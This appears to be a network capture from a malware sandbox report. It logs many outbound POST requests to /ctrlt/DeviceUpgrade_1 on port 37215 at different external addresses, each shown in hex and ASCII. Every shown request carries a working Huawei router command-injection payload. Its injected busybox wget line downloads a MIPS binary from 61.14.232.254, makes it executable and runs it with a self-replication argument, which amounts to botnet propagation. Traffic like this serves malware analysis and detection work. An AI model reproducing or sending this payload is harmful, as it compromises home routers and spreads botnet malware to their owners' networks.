                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2105192.168.2.1344014157.217.252.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716130018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2106192.168.2.133300241.97.123.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716145039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2107192.168.2.1349992152.223.243.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716175079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2108192.168.2.1341920157.227.205.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716197968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2109192.168.2.1335322157.11.190.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716309071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2110192.168.2.135429239.166.241.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716330051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2111192.168.2.135367253.88.122.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716392040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2112192.168.2.135197641.246.186.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716517925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2113192.168.2.134994041.178.202.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716522932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2114192.168.2.134079041.147.204.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.716631889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 